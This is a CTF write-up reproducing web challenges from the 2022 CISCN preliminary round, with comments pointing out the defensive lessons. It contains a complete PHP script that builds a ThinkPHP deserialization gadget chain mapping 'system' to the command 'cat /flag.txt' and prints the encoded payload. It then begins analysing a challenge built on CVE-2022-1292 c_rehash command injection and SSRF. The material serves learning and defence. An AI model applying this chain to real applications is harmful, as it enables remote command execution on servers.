[2022 CISCN]初赛 web题目复现

发布时间:2024-05-02 15:01

ezpop

网站存在源码泄露(www.zip),直接使用网上公开的反序列化(POP)链即可。从防御角度看,问题有两处:备份压缩包被留在了 Web 目录下,以及应用对用户可控的数据进行了反序列化。



namespace think\model\concern;

/**
 * Property-only declaration in the think\model\concern namespace.
 *
 * It defines no methods; its sole effect is to fix the names, visibility and
 * default values of three properties that end up in the serialized object.
 * The serialized bytes depend on these names and on the declaration order,
 * so the declarations must stay exactly as written.
 *
 * NOTE(review): presumably this shadows the framework's own trait of the same
 * name, whose attribute-reading code is what pairs the entry in $withAttr with
 * the entry in $data. That framework code is not shown on this page; confirm
 * against the framework source.
 */
trait Attribute
{
    // Nested map: attribute "key" holds a sub-array whose "key1" entry is a shell command string.
    private $data = ["key" => ["key1" => "cat /flag.txt"]];
    // Same key path as $data, but the leaf is the name of a PHP function ("system").
    private $withAttr = ["key"=>["key1"=>"system"]];
    // Names the "key" attribute; presumably marks it as JSON-typed for the framework (TODO confirm).
    protected $json = ["key"];
}
namespace think;

/**
 * Property-only declaration of think\Model, used to preset state before serialize().
 *
 * The class pulls in the Attribute trait and declares six further properties;
 * the only method is the constructor, which assigns fixed flag values and
 * stores its argument in $table.
 *
 * NOTE(review): the flag values presumably select a particular code path in
 * the framework's real Model class once the object is rebuilt by unserialize().
 * That path is not visible on this page. The defensive takeaway is that a
 * serialized object lets the sender choose every property value, private and
 * protected ones included.
 */
abstract class Model
{
    use model\concern\Attribute;
    private $lazySave;
    protected $withEvent;
    private $exists;
    private $force;
    protected $table;
    protected $jsonAssoc;
    /**
     * @param mixed $obj Value stored in $table; defaults to an empty string.
     *                   The script on this page also passes another Pivot here.
     */
    function __construct($obj = '')
    {
        $this->lazySave = true;
        $this->withEvent = false;
        $this->exists = true;
        $this->force = true;
        // When $obj is an object, it is serialized nested inside this one.
        $this->table = $obj;
        $this->jsonAssoc = true;
    }
}

namespace think\model;

use think\Model;

/**
 * Empty concrete subclass of Model.
 *
 * Model is declared abstract, so an instantiable child is required; this class
 * adds no properties or methods of its own. Its fully qualified name,
 * think\model\Pivot, is the class name recorded in the serialized output.
 */
class Pivot extends Model
{
}
// Inner object: constructed with the default '' for $table.
$a = new Pivot();
// Outer object: its $table property holds the inner Pivot, so the serialized
// form nests one object inside the other.
$b = new Pivot($a);

// Prints the URL-encoded serialize() output. Once URL-decoded, the string starts
// with an "O:" object marker naming think\model\Pivot, which request inspection
// and log review can look for.
// NOTE(review): this string is only meaningful to an application that passes
// request data to unserialize(). Decoding input with json_decode(), or calling
// unserialize($x, ['allowed_classes' => false]), avoids instantiating classes
// named by the sender.
echo urlencode(serialize($b));

online_crt

考点:

CVE-2022-1292(OpenSSL 的 c_rehash 脚本命令注入)

SSRF

项目分析

项目后端为 Python + Go:Python 服务部署在外网,Go 服务位于内网,需经由 Python 转发访问

先看python,一共有四个路由:

  • /为主界面

  • /getcrt生成一个x509证书

  • /createlink调用c_rehash创建证书链接

  • /proxy通过代理访问go内网服务
